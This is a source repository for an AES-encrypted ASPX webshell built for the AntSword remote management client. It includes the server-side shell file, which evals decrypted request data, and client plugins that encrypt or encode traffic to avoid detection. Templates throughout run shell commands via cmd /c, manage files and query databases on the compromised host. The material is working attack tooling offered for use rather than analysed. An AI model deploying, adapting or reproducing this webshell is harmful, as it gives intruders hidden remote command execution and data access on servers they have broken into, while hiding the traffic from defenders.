├── LICENSE ├── README.md ├── aspx ├── decoder │ ├── aspx_aes_128_cbc_de.js │ └── default.js ├── encoder │ ├── aspx_aes_128_cbc_en.js │ ├── base64.js │ ├── hex.js │ └── url_unicode.js ├── index.js └── template │ ├── base.js │ ├── command.js │ ├── database │ ├── access.js │ ├── default.js │ ├── dsn.js │ ├── microsoft_jet_oledb_4_0.js │ ├── mysql.js │ ├── oracle.js │ ├── sqloledb_1.js │ ├── sqloledb_1_sspi.js │ └── sqlserver.js │ └── filemanager.js └── xxx.aspx /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 youncyb 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AS_ASPX_AES_ENCODE 2 | 蚁剑AES加密通信ASPX Webshell 3 | 原理:[如何用AES加密蚁剑ASPX Webshell通信](https://www.youncyb.cn/?p=700) 4 | 5 | -------------------------------------------------------------------------------- /aspx/decoder/aspx_aes_128_cbc_de.js: -------------------------------------------------------------------------------- 1 | 'use strict'; 2 | 3 | 4 | const path = require('path'); 5 | 6 | var CryptoJS = require(path.join(window.antSword.remote.process.env.AS_WORKDIR, 'node_modules/crypto-js')); 7 | 8 | 9 | function decryptText(keyStr, text) { 10 | let decodedtext = CryptoJS.AES.decrypt(text, CryptoJS.enc.Utf8.parse(keyStr), { 11 | iv: CryptoJS.enc.Utf8.parse(keyStr), 12 | mode: CryptoJS.mode.CBC, 13 | padding: CryptoJS.pad.ZeroPadding 14 | }).toString(CryptoJS.enc.Utf8); 15 | return decodedtext; 16 | } 17 | 18 | module.exports = { 19 | asoutput: () => { 20 | return ` 21 | function B64Encode(bytes){ 22 | return System.Convert.ToBase64String(bytes); 23 | } 24 | function Encrypt(plaintext, aesKey){ 25 | var aesKeyBytes = utf8.GetBytes(aesKey); 26 | var aesEnc = aes.CreateEncryptor(aesKeyBytes, aes.IV); 27 | var plainBytes = utf8.GetBytes(plaintext); 28 | var cipherBytes = aesEnc.TransformFinalBlock(plainBytes, 0, plainBytes.length); 29 | var res = B64Encode(cipherBytes); 30 | return res; 31 | } 32 | function asenc(opcode){ 33 | var ak = aesKey; 34 | return ak + Encrypt(opcode, ak); 35 | } 36 | `.replace(/\n\s+/g, ''); 37 | }, 38 | 39 | decode_buff: (data, ext={}) => { 40 | data = data.toString(); 41 | try{ 42 | let aesKey = data.substring(0, 16); 43 | return Buffer.from(decryptText(aesKey, data.substring(16))); 44 | } 45 | catch(e){ 46 | return data; 47 | } 48 | } 49 | } -------------------------------------------------------------------------------- /aspx/decoder/default.js: -------------------------------------------------------------------------------- 1 | /** 2 | * aspx::default解码器 3 | */ 4 | 5 | 'use strict'; 6 | 7 | module.exports = { 8 | asoutput: () => { 9 | return ` 10 | function asenc(opcode){ 11 | return opcode; 12 | } 13 | `.replace(/\n\s+/g, ''); 14 | }, 15 | decode_buff: (buff) => { 16 | return buff; 17 | } 18 | } -------------------------------------------------------------------------------- /aspx/encoder/aspx_aes_128_cbc_en.js: -------------------------------------------------------------------------------- 1 | 'use strict'; 2 | 3 | const path = require('path'); 4 | 5 | var CryptoJS = require(path.join(window.antSword.remote.process.env.AS_WORKDIR, 'node_modules/crypto-js')); 6 | 7 | function randomRange(min, max){ 8 | var returnStr = "", 9 | range = (max ? Math.round(Math.random() * (max-min)) + min : min), 10 | charStr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; 11 | for(var i=0; i { 31 | let min = 16; 32 | let max = 16; 33 | let aesKey = randomRange(min, max); 34 | data[pwd] = Buffer.from(aesKey).toString("base64") + encryptTextByAes(aesKey, data['_']); 35 | 36 | delete data['_']; 37 | 38 | return data; 39 | } -------------------------------------------------------------------------------- /aspx/encoder/base64.js: -------------------------------------------------------------------------------- 1 | // 2 | // aspx::base64 编码模块 3 | // 4 | // :把除了密码的其他参数都base64编码一次 5 | // 6 | 7 | 'use strict'; 8 | 9 | module.exports = (pwd, data, ext = null) => { 10 | let randomID; 11 | if (ext.opts.otherConf['use-random-variable'] === 1) { 12 | randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']); 13 | } else { 14 | randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`; 15 | } 16 | data[randomID] = Buffer.from(data['_']).toString('base64'); 17 | data[pwd] = `eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(Request.Item["${randomID}"])),"unsafe");`; 18 | delete data['_']; 19 | return data; 20 | } -------------------------------------------------------------------------------- /aspx/encoder/hex.js: -------------------------------------------------------------------------------- 1 | // 2 | // aspx::hex 编码模块 3 | // 4 | // 把除了密码的其他参数都 hex 编码一次 5 | // 6 | 7 | 'use strict'; 8 | 9 | module.exports = (pwd, data, ext = null) => { 10 | let randomID; 11 | if (ext.opts.otherConf['use-random-variable'] === 1) { 12 | randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']); 13 | } else { 14 | randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`; 15 | } 16 | let hexencoder = "function HexAsciiConvert(hex:String) {var sb:System.Text.StringBuilder = new Sys" + 17 | "tem.Text.StringBuilder();var i;for(i=0; i< hex.Length; i+=2){sb.Append(System.Co" + 18 | "nvert.ToString(System.Convert.ToChar(Int32.Parse(hex.Substring(i,2), System.Glob" + 19 | "alization.NumberStyles.HexNumber))));}return sb.ToString();};"; 20 | data[randomID] = Buffer 21 | .from(data['_']) 22 | .toString('hex'); 23 | data[pwd] = `${hexencoder};eval(HexAsciiConvert(Request.Item["${randomID}"]),"unsafe");`; 24 | delete data['_']; 25 | return data; 26 | } -------------------------------------------------------------------------------- /aspx/encoder/url_unicode.js: -------------------------------------------------------------------------------- 1 | /** 2 | * aspx::url_unicode 编码器 3 | * 把字符转成 %uXXXX 形式 4 | * eg: Re => %u0052%u0065 5 | * Create at: 2019/05/31 17:11:01 6 | */ 7 | 8 | 'use strict'; 9 | 10 | function char2unicode(c) { 11 | if (c.length != 1) { 12 | return ''; 13 | } 14 | let buff = Buffer.alloc(4, '0'); 15 | let hexstr = c 16 | .charCodeAt() 17 | .toString(16); 18 | buff.write(hexstr, buff.length - hexstr.length, hexstr.length); 19 | return "\\u" + buff.toString(); 20 | } 21 | 22 | function string2unicode(str) { 23 | var ret = ""; 24 | for (var i = 0; i < str.length; i++) { 25 | ret += char2unicode(str[i]); 26 | } 27 | return ret; 28 | } 29 | 30 | /* 31 | * @param {String} pwd 连接密码 32 | * @param {Array} data 编码器处理前的 payload 数组 33 | * @return {Array} data 编码器处理后的 payload 数组 34 | */ 35 | module.exports = (pwd, data, ext = {}) => { 36 | data[pwd] = string2unicode(data['_']).replace(/\\u/g, 'asunescape(%)u'); 37 | // 删除 _ 原有的payload 38 | delete data['_']; 39 | // 返回编码器处理后的 payload 数组 40 | return data; 41 | } -------------------------------------------------------------------------------- /aspx/index.js: -------------------------------------------------------------------------------- 1 | /** 2 | * ASPX服务端脚本模板 3 | * 开写:2016/04/12 4 | * 更新:- 5 | * 作者:蚁逅 6 | * 7 | * 更新: 2016/04/23 8 | * - 优化 aspx 编码规则 9 | * 作者:Medici.Yan 10 | */ 11 | 'use strict'; 12 | 13 | // import Base from '../base'; 14 | const Base = require('../base'); 15 | 16 | class ASPX extends Base { 17 | constructor(opts) { 18 | super(opts); 19 | // 解析模板 20 | [ 21 | 'base', 22 | 'command', 23 | 'filemanager', 24 | 'database/dsn', 25 | 'database/mysql', 26 | 'database/access', 27 | 'database/oracle', 28 | 'database/sqlserver', 29 | 'database/sqloledb_1', 30 | 'database/sqloledb_1_sspi', 31 | 'database/microsoft_jet_oledb_4_0' 32 | ].map((_) => { 33 | this.parseTemplate(`./aspx/template/${_}`); 34 | }); 35 | // 解析编码器 36 | this 37 | .encoders 38 | .map((_) => { 39 | this.parseEncoder(`./aspx/encoder/${_}`); 40 | }); 41 | this 42 | .decoders 43 | .map((_) => { 44 | this.parseDecoder(`./aspx/decoder/${_}`); 45 | }); 46 | } 47 | 48 | /** 49 | * 获取编码器列表 50 | * @return {array} 编码器列表 51 | */ 52 | get encoders() { 53 | return ["base64", "hex", "url_unicode", "aspx_aes_128_cbc_en"]; 54 | } 55 | 56 | get decoders() { 57 | return ["default", "aspx_aes_128_cbc_de"]; 58 | } 59 | 60 | /** 61 | * HTTP请求数据组合函数 62 | * @param {Object} data 通过模板解析后的代码对象 63 | * @return {Promise} 返回一个Promise操作对象 64 | */ 65 | complete(data, force_default = false) { 66 | // 分隔符号 67 | let tag_s, tag_e; 68 | if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tags']) { 69 | tag_s = this.__opts__['otherConf']['custom-datatag-tags']; 70 | } else { 71 | tag_s = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "->|"; 72 | } 73 | if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tage']) { 74 | tag_e = this.__opts__['otherConf']['custom-datatag-tage']; 75 | } else { 76 | tag_e = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "|<-"; 77 | } 78 | 79 | // let formatter = new this.format(this.__opts__['encode']); 80 | let formatter = Base 81 | .prototype 82 | .format(this.__opts__); 83 | 84 | let aspxencode = this.__opts__['encode']; 85 | 86 | switch (this.__opts__['encode']) { 87 | case "UTF8": 88 | aspxencode = "UTF-8"; 89 | break; 90 | default: 91 | break; 92 | } 93 | let asencCode; 94 | let ext = { 95 | opts: this.__opts__, 96 | }; 97 | if (!force_default) { 98 | asencCode = this.__decoder__[this.__opts__['decoder'] || 'default'].asoutput(ext); 99 | } else { 100 | asencCode = this.__decoder__['default'].asoutput(ext); 101 | } 102 | // 替换代码中的 GetEncoding("!{ANT::ENDOCE}").GetString 的 tag 103 | data['_'] = data['_'].replace(/!{ANT::ENDOCE}/g, aspxencode); 104 | // base64编码一次数据 105 | let base64Code = formatter['base64'](data['_']); 106 | 107 | data['_'] = `Response.Write("${tag_s.substr(0,tag_s.length/2)}"+"${tag_s.substr(tag_s.length/2)}");${asencCode};var err:Exception;try{eval("var opcode='';" + System.Text.Encoding.GetEncoding("${aspxencode}").GetString(System.Convert.FromBase64String("${base64Code}")) + ";Response.Write(asenc(opcode));","unsafe");}catch(err){Response.Write(asenc("ERROR:// "+err.message));}Response.Write("${tag_e.substr(0,tag_e.length/2)}"+"${tag_e.substr(tag_e.length/2)}");Response.End();`; 108 | 109 | // 使用编码器进行处理并返回 110 | return this.encodeComplete(tag_s, tag_e, data); 111 | } 112 | } 113 | 114 | module.exports = ASPX; -------------------------------------------------------------------------------- /aspx/template/base.js: -------------------------------------------------------------------------------- 1 | /** 2 | * 基础信息模板 3 | * ? 获取当前路径、盘符列表 4 | */ 5 | 6 | module.exports = () => ({ 7 | info: { 8 | _: `var c=System.IO.Directory.GetLogicalDrives();opcode+=Server.MapPath(".")+"\t";for(var i=0;i<=c.length-1;i++)opcode+=c[i][0]+":";opcode+="\t"+Environment.OSVersion+"\t";opcode+=Environment.UserName;` 9 | }, 10 | probedb: { // 检测数据库函数支持 11 | _: `function fe(S:String){try{new ActiveXObject(S);return 1;}catch(Exception){return 0;}}; 12 | var n="Adodb.Connection|Adodb.RecordSet"; 13 | n=n.Split("|"); 14 | for(var i=0;i ({ 6 | exec: { 7 | _: `var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::bin}".substr(#randomPrefix#)))); 8 | var e=new System.Diagnostics.Process(); 9 | var out:System.IO.StreamReader,EI:System.IO.StreamReader; 10 | c.UseShellExecute=false; 11 | c.RedirectStandardOutput=true; 12 | c.RedirectStandardError=true; 13 | e.StartInfo=c; 14 | c.Arguments="/c "+System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::cmd}".substr(#randomPrefix#))); 15 | if("#{newbase64::env}".substr(#randomPrefix#)) { 16 | var envstr = System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::env}".substr(#randomPrefix#))); 17 | var envarr = envstr.split("|||asline|||"); 18 | var i; 19 | for (var i in envarr) { 20 | var ss = envarr[i].split("|||askey|||"); 21 | if (ss.length != 2) { 22 | continue; 23 | } 24 | c.EnvironmentVariables.Add(ss[0],ss[1]); 25 | } 26 | } 27 | e.Start(); 28 | out=e.StandardOutput; 29 | EI=e.StandardError; 30 | e.Close(); 31 | opcode += out.ReadToEnd() + EI.ReadToEnd();`.replace(/\n\s+/g, ''), 32 | }, 33 | listcmd: { 34 | _: `var binarr=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::binarr}".substr(#randomPrefix#))); 35 | var ss=binarr.split(","); 36 | var i; 37 | for(var i in ss){ 38 | opcode += ss[i]+"\\t"+(System.IO.File.Exists(ss[i])?1:0)+"\\n"; 39 | }`.replace(/\n\s+/g, ''), 40 | } 41 | }) -------------------------------------------------------------------------------- /aspx/template/database/access.js: -------------------------------------------------------------------------------- 1 | /** 2 | * access数据库驱动代码模板 3 | */ 4 | 5 | module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ 6 | // 显示所有数据库 7 | show_databases: { 8 | _: `var Conn=new ActiveXObject("Adodb.connection");Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));opcode+="#{dbname}"+"\\t";Conn.Close();`, 9 | 10 | }, 11 | // 显示数据库所有表 12 | show_tables: { 13 | _: `var Conn=new ActiveXObject("Adodb.connection");Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}");Conn.ConnectionTimeout=10;Conn.Open();var Rs=Conn.OpenSchema(20);var x:String="";while(!Rs.EOF && !Rs.BOF){if(Rs.Fields(3).Value=="TABLE"){x+=Rs.Fields(2).Value+"\\t";}Rs.MoveNext();}Rs.Close();Conn.Close();opcode+=x;`, 14 | 15 | }, 16 | // 显示表字段 17 | show_columns: { 18 | _: `function TN(n:Int32):String{switch(n){case 2:return "smallint";case 3:return "int";case 4:return "real";case 5:return "float";case 6:return "money";case 7:return "datetime";case 11:return "bit";case 12:return "variant";case 16:return "tinyint";case 17:return "tinyint";case 20:return "bigint";case 72:return "unique";case 128:return "binary";case 129:return "char";case 130:return "nchar";case 131:return "numeric";case 135:return "datetime";case 200:return "varchar";case 201:return "text";case 202:return "nvarchar";case 203:return "ntext";case 204:return "varbinary";case 205:return "image";default:return n;}}var Conn=new ActiveXObject("Adodb.connection");Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));var Rs=new ActiveXObject("ADODB.Recordset");Rs.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::table}")),Conn,1,1);var c:Int32;for(c=0;c<=Rs.Fields.Count-1;c++){opcode+=Rs.Fields.Item(c).Name+" ("+TN(Rs.Fields.Item(c).Type)+")\\t";}Rs.Close();Conn.Close();`, 19 | 20 | }, 21 | // 执行SQL语句 22 | query: { 23 | _: `var Conn=new ActiveXObject("Adodb.connection");var strSQL:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::sql}"));Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));Conn.ConnectionTimeout=10;Conn.Open();var CO:String="\\t|\\t",RN:String="\\r\\n",Dat:String;var Rs=Conn.Execute(strSQL);var i:Int32=Rs.Fields.Count,c:Int32;for(c=0;c ({ 6 | // 显示所有数据库 7 | show_databases: { 8 | _: `var Conn=new ActiveXObject("Adodb.connection");Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));opcode+="[ADO DATABASE]\\t";Conn.Close();`, 9 | }, 10 | // 显示数据库所有表 11 | show_tables: { 12 | _: `var Conn=new ActiveXObject("Adodb.connection");Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));Conn.ConnectionTimeout=10;Conn.Open();var Rs=Conn.OpenSchema(20);var x:String="";while(!Rs.EOF && !Rs.BOF){if(Rs.Fields(3).Value=="TABLE"){x+=Rs.Fields(2).Value+"\\t";}Rs.MoveNext();}Rs.Close();Conn.Close();opcode+=x;`, 13 | }, 14 | // 显示表字段 15 | show_columns: { 16 | _: `function TN(n:Int32):String{switch(n){case 2:return "smallint";case 3:return "int";case 4:return "real";case 5:return "float";case 6:return "money";case 7:return "datetime";case 11:return "bit";case 12:return "variant";case 16:return "tinyint";case 17:return "tinyint";case 20:return "bigint";case 72:return "unique";case 128:return "binary";case 129:return "char";case 130:return "nchar";case 131:return "numeric";case 135:return "datetime";case 200:return "varchar";case 201:return "text";case 202:return "nvarchar";case 203:return "ntext";case 204:return "varbinary";case 205:return "image";default:return n;}}var Conn=new ActiveXObject("Adodb.connection");Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));var Rs=new ActiveXObject("ADODB.Recordset");Rs.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::table}")),Conn,1,1);var c:Int32;for(c=0;c<=Rs.Fields.Count-1;c++){opcode+=Rs.Fields.Item(c).Name+" ("+TN(Rs.Fields.Item(c).Type)+")\\t";}Rs.Close();Conn.Close();`, 17 | }, 18 | // 执行SQL语句 19 | query: { 20 | _: `var Conn=new ActiveXObject("Adodb.connection");var strSQL:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::sql}"));Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));Conn.ConnectionTimeout=10;Conn.Open();var CO:String="\\t|\\t",RN:String="\\r\\n",Dat:String;var Rs=Conn.Execute(strSQL);var i:Int32=Rs.Fields.Count,c:Int32;for(c=0;c ({ 6 | // 显示所有数据库 7 | show_databases: { 8 | _: `var Conn=new ActiveXObject("Adodb.connection"); 9 | Conn.ConnectionTimeout=10; 10 | Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"))); 11 | var Rs=new ActiveXObject("ADODB.Recordset"); 12 | Rs.Open("SELECT USERNAME FROM ALL_USERS ORDER BY 1",Conn,1,1); 13 | while(!Rs.EOF && !Rs.BOF){ 14 | opcode+=Rs.Fields(0).Value+"\\t"; 15 | Rs.MoveNext(); 16 | } 17 | Rs.Close(); 18 | Conn.Close();`.replace(/\n\s+/g, ''), 19 | // Provider=OraOLEDB.Oracle;Data Source=test;User Id=sys;Password=;Persist 20 | // Security Info=True; 21 | [arg1]: '#{base64::conn}' 22 | }, 23 | // 显示数据库所有表 24 | show_tables: { 25 | _: `var Conn=new ActiveXObject("Adodb.connection"); 26 | Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")); 27 | Conn.ConnectionTimeout=10; 28 | Conn.Open(); 29 | var Rs=new ActiveXObject("ADODB.Recordset"); 30 | Rs.Open("SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='"+"#{dbname}"+"' ORDER BY 1)",Conn,1,1); 31 | while(!Rs.EOF && !Rs.BOF){ 32 | opcode+=Rs.Fields(0).Value+"\\t"; 33 | Rs.MoveNext(); 34 | } 35 | Rs.Close(); 36 | Conn.Close();`.replace(/\n\s+/g, ''), 37 | }, 38 | // 显示表字段 39 | show_columns: { 40 | _: `var Conn=new ActiveXObject("Adodb.connection"); 41 | Conn.ConnectionTimeout=10; 42 | Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"))); 43 | var Rs=new ActiveXObject("ADODB.Recordset"); 44 | Rs.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::table}")),Conn,1,1); 45 | var CO:String="\\t"; 46 | var i:Int32=Rs.Fields.Count,c:Int32; 47 | while(!Rs.EOF && !Rs.BOF){ 48 | opcode+=Rs.Fields(0).Value+" ("+Rs.Fields(1).Value+"("+Rs.Fields(2).Value+"))"; 49 | opcode+=CO; 50 | Rs.MoveNext(); 51 | } 52 | Rs.Close(); 53 | Conn.Close();`.replace(/\n\s+/g, ''), 54 | }, 55 | // 执行SQL语句 56 | query: { 57 | _: `var Conn=new ActiveXObject("Adodb.connection"); 58 | var strSQL:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::sql}")); 59 | Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")); 60 | Conn.ConnectionTimeout=10; 61 | Conn.Open(); 62 | var CO:String="\\t|\\t",RN:String="\\r\\n",Dat:String; 63 | var Rs=Conn.Execute(strSQL); 64 | var i:Int32=Rs.Fields.Count,c:Int32; 65 | for(c=0;c ({ 6 | // 显示所有数据库 7 | show_databases: { 8 | _: `var Conn=new ActiveXObject("Adodb.connection"); 9 | Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"))); 10 | var Rs=new ActiveXObject("ADODB.Recordset"); 11 | Rs.Open("SELECT [name] FROM master.dbo.sysdatabases ORDER BY 1",Conn,1,1); 12 | while(!Rs.EOF && !Rs.BOF){ 13 | opcode+=Rs.Fields(0).Value+"\\t"; 14 | Rs.MoveNext(); 15 | } 16 | Rs.Close(); 17 | Conn.Close();`.replace(/\n\s+/g, ''), 18 | }, 19 | // 显示数据库所有表 20 | show_tables: { 21 | _: `var Conn=new ActiveXObject("Adodb.connection"); 22 | Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"))); 23 | var Rs=new ActiveXObject("ADODB.Recordset"); 24 | Rs.Open("USE ["+"#{dbname}"+"]; 25 | SELECT [name] FROM sysobjects WHERE (xtype=\'U\') ORDER BY 1",Conn,1,1); 26 | while(!Rs.EOF && !Rs.BOF){ 27 | opcode+=Rs.Fields(0).Value+"\\t"; 28 | Rs.MoveNext(); 29 | } 30 | Rs.Close(); 31 | Conn.Close();`.replace(/\n\s+/g, ''), 32 | }, 33 | // 显示表字段 34 | show_columns: { 35 | _: `var Conn=new ActiveXObject("Adodb.connection"); 36 | Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"))); 37 | var Rs=new ActiveXObject("ADODB.Recordset"); 38 | Rs.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::table}")),Conn,1,1); 39 | var CO:String="\\t"; 40 | var i:Int32=Rs.Fields.Count,c:Int32; 41 | for(c=0;c ({ 6 | dir: { 7 | _: `var D=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var m=new System.IO.DirectoryInfo(D);var s=m.GetDirectories();var P:String;var i;function T(p:String):String{return System.IO.File.GetLastWriteTime(p).ToString("yyyy-MM-dd HH:mm:ss");}for(i in s){P=D+s[i].Name;opcode+=s[i].Name+"/\\t"+T(P)+"\\t0\\t"+(s[i].Attributes)+"\\n";}s=m.GetFiles();for(i in s){P=D+s[i].Name;opcode+=s[i].Name+"\\t"+T(P)+"\\t"+s[i].Length+"\\t"+(s[i].Attributes)+"\\n";}`, 8 | }, 9 | 10 | delete: { 11 | _: `var P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));if(System.IO.Directory.Exists(P)){System.IO.Directory.Delete(P,true);}else{System.IO.File.Delete(P);}opcode+="1";`, 12 | }, 13 | 14 | create_file: { 15 | _: `var P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var m=new System.IO.StreamWriter(P,false,Encoding.Default);m.Write(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::content}".substr(#randomPrefix#))));m.Close();opcode+="1";`, 16 | }, 17 | 18 | read_file: { 19 | _: `var P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var m=new System.IO.StreamReader(P,Encoding.Default);opcode+=m.ReadToEnd();m.Close();`, 20 | }, 21 | 22 | copy: { 23 | _: `var S=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var D=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::target}".substr(#randomPrefix#)));function cp(S:String,D:String){if(System.IO.Directory.Exists(S)){var m=new System.IO.DirectoryInfo(S);var i;var f=m.GetFiles();var d=m.GetDirectories();System.IO.Directory.CreateDirectory(D);for (i in f)System.IO.File.Copy(S+"\\\\"+f[i].Name,D+"\\\\"+f[i].Name);for (i in d)cp(S+"\\\\"+d[i].Name,D+"\\\\"+d[i].Name);}else{System.IO.File.Copy(S,D);}}cp(S,D);opcode+="1";`, 24 | }, 25 | 26 | download_file: { 27 | _: `Response.WriteFile(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#))));`, 28 | }, 29 | 30 | upload_file: { 31 | _: 32 | // `var 33 | // P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.C 34 | // onvert.FromBase64String(Request.Item["${arg1}"].substr(#randomPrefix#)));var 35 | // Z:String=Request.Item["${arg2}"].substr(#randomPrefix#);var B:byte[]=new byte[Z.Length/2];for(var 36 | // i=0;iAppend 40 | `var P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var Z:String="#{buffer::content}";var B:byte[]=new byte[Z.Length/2];for(var i=0;i 2 | <% 3 | var utf8 = new ActiveXObject("System.Text.UTF8Encoding"); 4 | var b64Enc = new ActiveXObject("System.Security.Cryptography.ToBase64Transform"); 5 | var b64Dec = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 6 | var aes = new ActiveXObject("System.Security.Cryptography.RijndaelManaged"); 7 | aes.Padding = 3; 8 | aes.KeySize = 128; 9 | function B64Decode(b64Str){ 10 | var bytes = utf8.GetBytes(b64Str); 11 | var decoded_bytes = b64Dec.TransformFinalBlock((bytes), 0, bytes.length); 12 | return decoded_bytes; 13 | } 14 | function Decrypt(cipherText, aesKey){ 15 | var aesKeyBytes = utf8.GetBytes(aesKey); 16 | aes.IV = aesKeyBytes; 17 | var cipherBytes = B64Decode(cipherText); 18 | var aesDec = aes.CreateDecryptor((aesKeyBytes), (aes.IV)); 19 | var plainBytes = aesDec.TransformFinalBlock(cipherBytes, 0, cipherBytes.length); 20 | var res = utf8.GetString(plainBytes); 21 | return res; 22 | } 23 | var data = Request.Item["ant"]; 24 | var aesKey = data.substring(0,24); 25 | aesKey = utf8.GetString(B64Decode(aesKey)); 26 | var encrypt_res = data.substring(24); 27 | var decrypted = Decrypt(encrypt_res, aesKey); 28 | eval(decrypted,"unsafe"); 29 | 30 | %> --------------------------------------------------------------------------------